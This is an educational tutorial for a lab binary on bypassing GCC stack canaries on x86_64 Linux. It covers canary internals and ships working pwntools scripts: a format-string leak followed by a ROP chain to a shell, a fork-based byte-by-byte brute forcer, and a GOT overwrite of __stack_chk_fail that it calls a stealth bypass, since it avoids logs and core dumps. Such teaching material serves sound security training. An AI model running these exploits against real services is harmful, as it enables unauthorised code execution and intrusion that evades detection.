Bypassing GCC Stack Canaries on Linux

GCC’s stack canary (the “stack smashing protector”, SSP) places a random word between local variables and the saved return address. The function epilogue re-reads that word and aborts via __stack_chk_fail if it changed. A linear stack overflow that overwrites the saved RIP must also overwrite the canary — and unless you know its value, the program dies before ret ever runs.

This tutorial covers four practical bypasses: leaking the canary with a format string, brute-forcing it byte by byte across fork(), redirecting __stack_chk_fail in the GOT, and pivoting around the check entirely. It also covers what does not work, because students burn a lot of time on those paths.

Note (Lab Binary): This tutorial uses the target binary from the Linux Exploitation Lab (14-stack-canaries/). See the setup guide for build instructions.

How GCC Stack Canaries Actually Work

The common flavours

GCC offers several stack protector modes. These are the common ones you will see in exploitation labs and distro builds:

Flag	Functions instrumented
`-fstack-protector`	Functions that call `alloca` or have a `char` buffer of 8 bytes or more (threshold set by `--param=ssp-buffer-size`)
`-fstack-protector-strong`	Functions with any local array, `alloca`, or address-taken locals
`-fstack-protector-all`	Every function frame, regardless of contents
`-fstack-protector-explicit`	Only functions annotated with `stack_protect`

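Most Linux distros build user binaries with -fstack-protector-strong, and the Linux kernel’s strongest setting (CONFIG_STACKPROTECTOR_STRONG) uses the same mode. -fstack-protector-all is mostly seen in hardened or lab builds, because instrumenting every function carries the highest runtime cost.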

Where the canary lives

On x86_64, the canary is loaded from the Thread Local Storage block at offset 0x28:

mov    rax, QWORD PTR fs:0x28

On i386, it lives at gs:0x14. The TLS block itself is set up by glibc. Modern glibc initializes the canary from the 16 random bytes that the kernel passes through the AT_RANDOM entry of the auxiliary vector, via _dl_setup_stack_chk_guard(), then stores the result in TLS.
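As a rough model of that setup step, the sketch below mimics the little-endian path of glibc’s generic _dl_setup_stack_chk_guard(): take the first machine word of the AT_RANDOM bytes and clear its lowest byte. The name derive_guard and the use of os.urandom as a stand-in for the kernel-supplied bytes are illustrative assumptions, not glibc code.

```python
import os

WORD = 8  # sizeof(uintptr_t) on x86_64

def derive_guard(at_random: bytes) -> int:
    """Model the little-endian path: first word of AT_RANDOM with the low byte cleared."""
    if len(at_random) < WORD:
        raise ValueError("need at least one machine word of random bytes")
    word = int.from_bytes(at_random[:WORD], "little")
    return word & ~0xFF  # drop the least significant byte

# os.urandom stands in for the 16 bytes the kernel supplies (assumption).
guard = derive_guard(os.urandom(16))
print(f"guard     = {guard:#018x}")
print(f"in memory = {guard.to_bytes(WORD, 'little').hex()}")
```

The "in memory" line starts with 00 because x86_64 stores the least significant byte at the lowest address, which is the first canary byte an overflow reaches.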

The all-zero low byte

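The least significant byte of the canary is always \x00 on glibc. On little-endian x86 that is the byte at the lowest address, the first one a linear overflow reaches. This is by design, not by accident, and it does two things. An unterminated string sitting just below the canary cannot leak it through puts() or printf("%s"), because the read stops at the NUL. And string functions that stop at NUL, such as strcpy(), cannot write a complete forged canary and keep going: the copy ends at the zero byte. Functions that accept NUL bytes, such as read() and gets() (which stops only at a newline), are not hindered. Do not confuse this with weakness: the byte is a deliberate barrier, not a leaked secret. The remaining 7 bytes are random.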
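To make the effect on NUL-terminated copies concrete, here is a small simulation. c_strcpy is a hypothetical Python stand-in for strcpy(), and the frame contents are made-up values; the point is only that the copy stops at the canary’s zero byte even when the attacker knows the full canary.

```python
def c_strcpy(memory: bytearray, dst: int, src: bytes) -> int:
    """Copy src up to and including its first NUL, as strcpy() would. Returns bytes written."""
    end = src.index(0) if 0 in src else len(src)
    data = src[:end] + b"\x00"
    memory[dst:dst + len(data)] = data
    return len(data)

# Toy frame: 16-byte buffer, canary, saved RBP, saved RIP (all values made up).
canary    = (0x1122334455667700).to_bytes(8, "little")
saved_rbp = (0x00007FFFFFFFE500).to_bytes(8, "little")
saved_rip = (0x0000000000401256).to_bytes(8, "little")
frame = bytearray(b"\x00" * 16 + canary + saved_rbp + saved_rip)

# Attacker knows the canary and tries to copy it through, followed by a new RIP.
payload = b"A" * 16 + canary + b"B" * 8 + (0x401337).to_bytes(8, "little")
written = c_strcpy(frame, 0, payload)

print("bytes written:", written)
print("canary intact:", frame[16:24] == canary)
print("saved RIP untouched:", frame[32:40] == saved_rip)
```

The copy writes the 16 filler bytes plus a terminator that lands on the canary’s own zero byte, so nothing past the canary changes.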

Prologue and epilogue

A function with a vulnerable buffer compiled with -fstack-protector-strong looks like this:

; --- prologue ---
push   rbp
mov    rbp, rsp
sub    rsp, 0x130
mov    rax, QWORD PTR fs:0x28        ; load canary from TLS
mov    QWORD PTR [rbp-0x8], rax       ; store on stack just below saved RBP
xor    eax, eax

; ... function body, gets(buf), etc ...

; --- epilogue ---
mov    rax, QWORD PTR [rbp-0x8]       ; reload from stack
sub    rax, QWORD PTR fs:0x28         ; compare against TLS copy
jne    .stack_chk_failed              ; mismatch -> die
leave
ret
.stack_chk_failed:
call   __stack_chk_fail@plt

__stack_chk_fail calls __fortify_fail, which prints a “stack smashing detected” diagnostic through glibc’s fatal-message path and then aborts. The diagnostic does not include the canary value. Whether a remote attacker sees the text depends on how the service wired file descriptor 2; in many inetd-style services stderr is not connected to the attacker’s socket, so the observable signal is just a dropped connection.

Stack layout

High addr
  +---------------------------+
  | saved RIP                 |  <- ret target
  +---------------------------+
  | saved RBP                 |
  +---------------------------+
  | canary  (8 bytes, low=00) |  <- compared in epilogue
  +---------------------------+
  | local variables           |
  | char buf[256]             |  <- overflow source
  +---------------------------+
Low addr (RSP)

A linear overflow walks low-to-high: buffer -> canary -> saved RBP -> saved RIP. To reach RIP you must write through the canary. If your write doesn’t preserve the canary’s exact value, you abort.
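The distances in that walk follow directly from the frame’s rbp-relative offsets. The helper below is a minimal sketch; frame_offsets and the example frame (buffer at [rbp-0x110], canary at [rbp-0x8]) are assumptions for illustration, so read the real offsets from your own disassembly.

```python
def frame_offsets(buf_below_rbp: int, canary_below_rbp: int = 8, word: int = 8) -> dict:
    """Distances in bytes from the start of the buffer to each protected slot.

    buf_below_rbp: the N in [rbp-N] where the buffer starts.
    canary_below_rbp: the N in [rbp-N] where the canary is stored.
    """
    if buf_below_rbp <= canary_below_rbp:
        raise ValueError("buffer must start below the canary")
    return {
        "canary": buf_below_rbp - canary_below_rbp,
        "saved_rbp": buf_below_rbp,
        "saved_rip": buf_below_rbp + word,
    }

# Hypothetical frame: buffer at [rbp-0x110], canary at [rbp-0x8].
for slot, off in frame_offsets(0x110).items():
    print(f"{slot:<9} at buffer+{off}")
```

The "canary" distance is the filler length an overflow needs before the first canary byte.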

Thread and fork behavior

On mainstream glibc, new threads receive a copy of the creating thread’s stack guard in their TLS. That means a leak from one thread is generally useful elsewhere in the same process unless the program or runtime explicitly rekeys guards. Forking servers are even simpler: the child inherits the parent’s address space, including the TLS block holding the canary.

Initial Analysis

checksec ./target

RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE

Disassemble main to confirm a real GCC canary (not a hand-rolled integrity word):

objdump -d -M intel ./target | grep -A2 -B2 'fs:0x28'

  401234:  64 48 8b 04 25 28 00    mov    rax,QWORD PTR fs:0x28
  40123b:  00 00
  40123d:  48 89 45 f8             mov    QWORD PTR [rbp-0x8],rax
  ...
  4012a5:  48 8b 45 f8             mov    rax,QWORD PTR [rbp-0x8]
  4012a9:  64 48 33 04 25 28 00    xor    rax,QWORD PTR fs:0x28
  4012b0:  00 00
  4012b2:  74 05                   je     4012b9 <main+0x85>
  4012b4:  e8 87 fd ff ff          call   401040 <__stack_chk_fail@plt>

The xor form is what older GCC emits; newer versions use sub plus jne, as in the prologue and epilogue listing earlier. Same effect.

Bypass 1: Leak via Format String

If you have a format-string bug before the overflow, leak the canary, then splice it back into the overflow payload at the right offset.

See Format String Vulnerabilities on x86 for the mechanics. Quick recap: %N$p prints the Nth variadic argument as a pointer; on x86_64 the first five come from registers and the rest from the stack.

Finding the canary’s format-string offset

./target
> %1$p %2$p %3$p ... %30$p
0x7ffe1234abcd 0x4011a0 ... 0xb4d3f8c1e2a70000

Pick the value with a zero low byte and high-entropy upper bytes; it stands out from stack and code pointers. The index depends on the frame layout, so do not rely on a memorized number. Since %6$p is the qword at RSP when printf is called on x86_64, a canary at rbp-0x8 in the same frame sits at index 6 + (rbp - 8 - rsp) / 8. The examples below use %23$p; substitute whatever index your binary gives. Verify in GDB:

gdb-peda$ b *main+EPILOGUE_OFFSET
gdb-peda$ run
gdb-peda$ x/gx $rbp-0x8
0x7fffffffe418: 0xb4d3f8c1e2a70000
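Picking the candidate out of a long leak by eye gets tedious, so a small filter helps. The sketch below builds the probe string and flags values that have a zero low byte and are not canonical user-space pointers. Both function names are hypothetical, and the pointer test is a heuristic: a real canary could fail it, with negligible probability.

```python
def probe_string(first: int, last: int) -> str:
    """Build '%first$p ... %last$p' for a positional format-string leak."""
    return " ".join(f"%{i}$p" for i in range(first, last + 1))

def canary_candidates(leak_line: str, first: int = 1):
    """Return (index, value) pairs that look like a glibc stack guard."""
    hits = []
    for idx, token in enumerate(leak_line.split(), start=first):
        if token == "(nil)":          # glibc prints NULL pointers this way
            continue
        value = int(token, 16)
        low_byte_zero = value & 0xFF == 0
        # User-space addresses on x86_64 fit in 47 bits; a random guard almost never does.
        not_a_user_pointer = (value >> 47) != 0
        if low_byte_zero and not_a_user_pointer:
            hits.append((idx, value))
    return hits

print(probe_string(1, 4))
sample = "0x7ffe1234abcd 0x4011a0 (nil) 0xb4d3f8c1e2a70000"
for idx, value in canary_candidates(sample):
    print(f"%{idx}$p looks like a canary: {value:#018x}")
```

Treat any hit as a hypothesis and confirm it against $rbp-0x8 in the debugger, as above.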

Two-shot exploit

If the program loops (read -> print -> read -> print, then eventually return), one request leaks, the next overflows:

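from pwn import *

context.arch = 'amd64'
elf = ELF('./target')
io = remote('target', 5556)

# Placeholder lookups: they assume the binary contains a `pop rdi; ret`
# gadget, a "/bin/sh" string, and a PLT stub for system(). Verify each one.
pop_rdi    = ROP(elf).find_gadget(['pop rdi', 'ret'])[0]
sh_str     = next(elf.search(b'/bin/sh\x00'))
system_plt = elf.plt['system']

# Stage 1: leak canary
io.sendlineafter(b'> ', b'%23$p')
canary = int(io.recvline().strip(), 16)
log.info(f'canary = {canary:#018x}')
assert canary & 0xff == 0, 'low byte must be zero'

# Stage 2: overflow with canary preserved
buf  = b'A' * 264                 # buffer fill up to canary
buf += p64(canary)                # restore canary
buf += b'B' * 8                   # saved RBP (any value)
buf += p64(pop_rdi) + p64(sh_str) # ROP starts here: rdi = "/bin/sh"
buf += p64(system_plt)            # if system() faults on movaps, put a lone
                                  # `ret` gadget before pop_rdi to realign RSP
io.sendlineafter(b'> ', buf)
io.interactive()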

The 264-byte fill assumes a char buf[256] plus 8 bytes of other locals; adjust to your binary. Use a cyclic pattern to find the exact canary offset if you don’t know it.

Bypass 2: Brute Force Across Forks

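When a server uses accept() -> fork() -> handle, every child inherits the parent’s address space, including the TLS block holding the canary. Crash one child and the parent forks another with the same canary. This is the classic self-forking network daemon, and it is the canary’s worst case. Launchers such as inetd, xinetd, or socat with EXEC do not qualify: they exec() the service for every connection, so each connection gets a fresh canary.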

Why it works

fork() performs a copy-on-write clone of the parent’s pages. TLS lives in the parent and is copied into the child intact. The child’s fs:0x28 returns the same 8 bytes the parent had. Crashing the child does not perturb the parent’s TLS, and the next fork() produces another child with the same value.

This does not work if:

The server exec()s a fresh binary per connection (new process image -> new TLS -> new canary).
The service restarts the whole binary on crash (e.g. systemd with Restart=on-failure).
The service uses pre-fork worker pools where workers are recycled via exec.

The bypass requires fork() without exec(). Make sure of this before sinking 1700 requests into nothing.

Byte-by-byte walk

The low byte is \x00. The other 7 bytes are random but fixed across forks. Brute force one byte at a time:

Set canary[0] = \x00 (known).
For each of canary[1..7]: overwrite only the bytes up to and including that one, trying values \x00 through \xff until the child does not crash.
A wrong byte triggers __stack_chk_fail -> abort() -> connection drops. A right byte means the function returns normally — the connection persists, output appears, whatever the program does after the vulnerable function happens.
After 7 bytes, you have the full canary.

Worst case 256 * 7 = 1792 connections; average case ~896. Trivially fast over localhost or a LAN.
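The request counts can be checked offline against a local stand-in for the server. In the sketch below, make_oracle plays the role of the forking service: it reports survival exactly when the overwritten prefix matches the secret. Both function names are hypothetical, and a real oracle is a network probe rather than a byte comparison.

```python
import os

def make_oracle(secret: bytes):
    """Local stand-in for the forking server: True if the overwritten prefix matches."""
    def oracle(prefix: bytes) -> bool:
        return secret[:len(prefix)] == prefix
    return oracle

def brute_canary(oracle, width: int = 8):
    """Recover the canary one byte at a time. Returns (canary, attempts)."""
    known = b"\x00"                      # low byte is fixed on glibc
    attempts = 0
    for _ in range(1, width):
        for guess in range(256):
            attempts += 1
            if oracle(known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError("no byte value survived; the oracle is unreliable")
    return known, attempts

secret = b"\x00" + os.urandom(7)         # random guard with a zero low byte
found, attempts = brute_canary(make_oracle(secret))
print("recovered:", found == secret, "in", attempts, "attempts")
```

A secret whose seven random bytes are all \xff hits the worst case of 1792 attempts; one that is all zero finishes in 7.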

pwntools brute forcer

Assume the vulnerable function calls read() with a length large enough to reach past the canary, accepts short input, and appends no terminator. A payload of BUFLEN + k bytes then overwrites exactly the first k canary bytes and leaves the rest untouched. If those k bytes are correct, the function returns and a known confirmation byte gets echoed; if not, the connection drops mid-write.

from pwn import *
from pwnlib.exception import PwnlibException
import socket

HOST, PORT = 'target', 5556
BUFLEN = 264                # buffer size up to canary

def try_prefix(prefix):
    """Overwrite only the first len(prefix) bytes of the canary.
    Return True if the child survived past the canary check."""
    io = None
    try:
        io = remote(HOST, PORT, timeout=2)
        # Partial overwrite: send the known and guessed bytes and nothing
        # more. The canary bytes we have not reached keep their real values,
        # so the check passes exactly when every byte of `prefix` is right.
        # Padding the unknown tail with filler would fail the check every time.
        payload = b'A' * BUFLEN + prefix
        # Use send(), not sendline(): a trailing newline would clobber the
        # next canary byte. Do NOT touch RBP/RIP either. The canary check
        # fires at function return, before RIP is consumed.
        io.send(payload)
        # Probe: if the canary matched, the function returned and the program
        # sent its normal post-function output. If it mismatched, abort()
        # killed the child and recv() returns empty or raises EOFError.
        data = io.recv(timeout=1)
        return len(data) > 0
    except (EOFError, socket.error, PwnlibException):
        return False
    finally:
        if io is not None:
            io.close()

canary = b'\x00'                                    # low byte is always 0
for byte_idx in range(1, 8):
    log.info(f'brute byte {byte_idx}')
    for guess in range(256):
        candidate = canary + bytes([guess])
        if try_prefix(candidate):
            canary = candidate
            log.success(f'byte {byte_idx} = {guess:#04x}  canary so far = {canary.hex()}')
            break
    else:
        log.failure(f'byte {byte_idx}: no value worked -- check your assumptions')
        break

log.success(f'full canary: {canary.hex()}')

Probe quality matters

The above relies on “did we get any data back” as the oracle. That is brittle. Better oracles:

Time the response. A surviving child does some work; a crashing child returns near-instantly when abort() runs. Measure both and pick a threshold.
Look for a specific byte the program prints only on the success path.
Use a two-stage payload: overflow, then send a second message; only a surviving child reads the second message.

Pick whichever distinguishes survival from crash most reliably for your target.
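For the timing oracle, one simple way to pick the threshold is to calibrate on two sets of measurements: response times from benign requests that do not overflow, and response times from payloads with a deliberately wrong canary byte. The sketch below is an assumption-laden illustration; pick_threshold and survived are hypothetical helpers, and the sample numbers are made up.

```python
def pick_threshold(crash_times, survive_times):
    """Return a cutoff in seconds between the two samples, or None if they overlap.

    Assumes a surviving child takes longer to respond than one that aborts.
    """
    slowest_crash = max(crash_times)
    fastest_survivor = min(survive_times)
    if slowest_crash >= fastest_survivor:
        return None  # timing cannot separate the two outcomes
    return (slowest_crash + fastest_survivor) / 2

def survived(elapsed, threshold):
    """Classify one measured response time against the calibrated cutoff."""
    return elapsed > threshold

# Made-up calibration samples, in seconds.
threshold = pick_threshold([0.004, 0.006, 0.005], [0.051, 0.048, 0.060])
print("usable threshold:", threshold is not None)
```

If pick_threshold returns None, the distributions overlap and timing is the wrong oracle for that target; fall back to one of the other probes.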

Caveat: where the overflow stops

For brute force, overwrite only up to the canary byte you are currently guessing. Do not overwrite the saved RBP or RIP yet. The canary is checked before leave and ret, so those values play no part in the check. But a child that passes the check and then crashes on a corrupted saved RBP or RIP looks exactly like a canary failure to your oracle. That is a false negative: the guess was right and you discarded it.

Once you have the full canary, do a final exploit shot that includes the canary plus a full ROP chain.

Bypass 3: Overwriting `__stack_chk_fail` in the GOT

If you have a write primitive independent of the canary path — a format-string %hn write, an arbitrary-write heap bug, an out-of-bounds array write — you can redirect __stack_chk_fail@got.plt to a function of your choice. The canary check still happens, the mismatch is still detected, but the call goes somewhere harmless or attacker-controlled.

Useful targets to redirect to:

exit: silently terminate without abort/SIGABRT and without printing the diagnostic. Useful in info-leak contexts where you’ve already extracted what you need.
A one-gadget in libc (execve("/bin/sh", 0, 0) style): if libc is leaked, redirect straight to a one-gadget. Its constraints (specific register and stack states) are not guaranteed at the canary-check site, so check them in a debugger at the call to __stack_chk_fail before relying on one.
A jump back into the binary’s own code: for example a win function or another code path you want to reach. A shellcode buffer only works if its memory is executable, which NX rules out on this target.

Finding the GOT entry

objdump -R ./target | grep stack_chk_fail

0000000000404038 R_X86_64_JUMP_SLOT  __stack_chk_fail@GLIBC_2.4

0x404038 is the GOT slot. With Partial RELRO this slot is writable at runtime; with Full RELRO it is not (see below).
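When scripting the exploit it is convenient to pull the slot address out of the objdump -R text rather than hard-coding it. The parser below is a minimal sketch; got_slot is a hypothetical helper, and it assumes the three-column layout shown above (offset, relocation type, symbol with an optional @VERSION suffix).

```python
def got_slot(objdump_r_output: str, symbol: str):
    """Return the relocation offset for `symbol` from `objdump -R` text, or None."""
    for line in objdump_r_output.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        offset, _reloc_type, name = parts
        if name.split("@")[0] == symbol:   # drop the @GLIBC_x.y version suffix
            return int(offset, 16)
    return None

sample = """\
DYNAMIC RELOCATION RECORDS
OFFSET           TYPE              VALUE
0000000000404038 R_X86_64_JUMP_SLOT  __stack_chk_fail@GLIBC_2.4
"""
slot = got_slot(sample, "__stack_chk_fail")
print(hex(slot) if slot is not None else "not found")
```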

Skeleton: format string overwrite

Assume a format-string primitive that lets you write 2 bytes at a time via %hn:

from pwn import *

context.arch = 'amd64'
io = remote('target', 5556)

stack_chk_got = 0x404038
target_addr   = 0x4012e0          # function we want to call instead

# fmtstr_payload writes target_addr at stack_chk_got
# offset 6 = where our format-string buffer begins on the stack (verify!)
# write_size='short' selects 2-byte %hn writes (the default is 1-byte %hhn)
payload = fmtstr_payload(6, {stack_chk_got: target_addr}, write_size='short')
io.sendline(payload)

# Now trigger the overflow. The canary check WILL detect the mismatch
# and call __stack_chk_fail@plt -- which now resolves to target_addr.
overflow  = b'A' * 264
overflow += b'CANARY!!'           # garbage, doesn't matter
overflow += b'B' * 8              # saved RBP
overflow += p64(0xdeadbeef)       # saved RIP, won't be reached
io.sendline(overflow)

io.interactive()

The trick is that the canary check now becomes the trigger for code execution rather than a kill switch. You don’t need to know the canary value at all — you want it to mismatch.

Constraint: lazy resolution path

__stack_chk_fail@plt typically goes through .got.plt (lazy resolution table), not the immutable .got. Partial RELRO leaves .got.plt writable. Full RELRO (-Wl,-z,relro,-z,now) resolves all symbols at load time and remaps .got.plt read-only. With Full RELRO, this whole bypass is dead — writing to 0x404038 will fault.

Check at runtime:

gdb-peda$ vmmap 0x404038
Start              End                Perm
0x0000000000404000 0x0000000000405000 r--p   # Full RELRO: read-only
0x0000000000404000 0x0000000000405000 rw-p   # Partial RELRO: writable
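Outside GDB, the same information is available from /proc/<pid>/maps on Linux. The sketch below looks up the permission string for an address in that text format; perms_at is a hypothetical helper and the sample lines (including the /lab/target path) are made up to mirror the two cases above.

```python
def perms_at(maps_text: str, addr: int):
    """Return the permission string (e.g. 'rw-p') of the mapping containing addr, or None."""
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        start_s, _, end_s = fields[0].partition("-")
        start, end = int(start_s, 16), int(end_s, 16)
        if start <= addr < end:
            return fields[1]
    return None

GOT_SLOT = 0x404038
partial_relro = "00404000-00405000 rw-p 00003000 08:01 42 /lab/target"
full_relro    = "00404000-00405000 r--p 00003000 08:01 42 /lab/target"

for label, maps in (("partial", partial_relro), ("full", full_relro)):
    perms = perms_at(maps, GOT_SLOT)
    print(f"{label}: {perms}, GOT overwrite possible: {'w' in perms}")
```

Against a live process, pass the contents of /proc/<pid>/maps as maps_text.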

Why `exit` is the cleanest target

If you’ve already exfiltrated what you need (a leaked libc address, a flag, a token) before the overflow, redirecting __stack_chk_fail to exit lets the program terminate without the SSP diagnostic ever firing. No “stack smashing detected” line in the journal, no SIGABRT, no core dump. Stealth bypass.

Bypass 4: Stack Pivot Around the Check

The canary is checked in the function’s epilogue. If you can transfer control somewhere else without traversing that epilogue, the check never runs.

This is rare. Cases where it happens:

The vulnerable function calls something that itself takes a function pointer from the corrupted stack region (a corrupted vtable, an indirect call through a struct field). You hijack control before the canary check.
A heap or BSS bug overwrites a saved jump target used elsewhere. You return cleanly from the canary-protected function, then control flow reaches the corrupted pointer later.
An exception handler / longjmp / SIGSEGV handler is reachable. siglongjmp jumps to a saved context without unwinding the way ret does, skipping the canary check.

Brief mention only. If you have one of these primitives, you usually don’t need to think about the canary at all — just don’t disturb it.

What Doesn’t Work

“I’ll just guess the canary”

7 bytes of randomness = 2^56 possibilities. Without fork() reuse, a fresh canary per process means roughly 72 quadrillion guesses. Not happening.
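To put that number in wall-clock terms, the arithmetic below converts the guess space into an expected duration. The rate of one million guesses per second is an arbitrary and very generous assumption for a network service, and expected_years is a hypothetical helper.

```python
SECONDS_PER_YEAR = 365 * 24 * 3600
GUESS_SPACE = 2 ** 56  # 7 random bytes

def expected_years(guesses_per_second: float) -> float:
    """Mean time to a hit when every attempt faces a fresh, independent canary."""
    # Each attempt succeeds with probability 1/GUESS_SPACE, so the expected
    # number of attempts is GUESS_SPACE (geometric distribution).
    return GUESS_SPACE / guesses_per_second / SECONDS_PER_YEAR

print(f"guess space: {GUESS_SPACE:,}")
print(f"at 1,000,000 guesses/s: about {expected_years(1_000_000):,.0f} years")
```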

“I’ll write whatever I want and hope”

Some students send \x00\x00\x00\x00\x00\x00\x00\x00 figuring “the low byte is zero, maybe the rest is too.” It isn’t. The other 7 bytes are random data initialized from AT_RANDOM. The probability of an all-zero canary is 1 in 2^56.

“PIE will protect me”

PIE randomizes the binary’s base address. It does not affect the canary at all — the canary lives in TLS, controlled by glibc, independent of PIE. A format-string leak gives you the canary regardless of whether the binary is PIE.

“The stack canary diagnostic will leak into my socket”

__stack_chk_fail emits a fatal diagnostic and aborts, but the message does not contain the canary value. Whether you see the text over the network depends entirely on how stderr is connected. Many services leave stderr on a terminal, a log, or /dev/null; some challenge harnesses wire it to the socket. Treat the abort as a crash oracle, not an information leak.

“Partial RELRO is the same as Full RELRO”

It isn’t. Partial RELRO marks .got (initial symbols) read-only but leaves .got.plt (lazy-resolved entries) writable. __stack_chk_fail is in .got.plt. Partial RELRO does not block Bypass 3. Always check with checksec or by inspecting page permissions.

Mitigations Summary

Mitigation	Blocks Bypass 1 (leak)	Blocks Bypass 2 (brute)	Blocks Bypass 3 (GOT)
`-fstack-protector` -> `-strong`	No	No	No
Full RELRO	No	No	Yes
`exec()` per connection (no fork)	No	Yes	No
No format-string vulnerability	Yes	No	No (if other write exists)

The combination that actually defeats these bypasses: Full RELRO + no format-string bug + no independent write primitive + fresh process state for each connection. Most production binaries lack at least one of these.

Key Takeaways

The canary lives in TLS at fs:0x28 on x86_64. The low byte is always \x00 by design.
fork() without exec() reuses the canary, enabling a byte-by-byte brute force of at most 1792 requests.
A format-string leak ends the protection — read the canary, splice it into your overflow.
GOT overwrite of __stack_chk_fail turns the kill switch into a jump primitive, but only against Partial RELRO.
The diagnostic does not leak the canary. At most it gives you a crash/survival signal.
PIE does not interact with the canary. A leak is a leak whether or not the binary is position-independent.
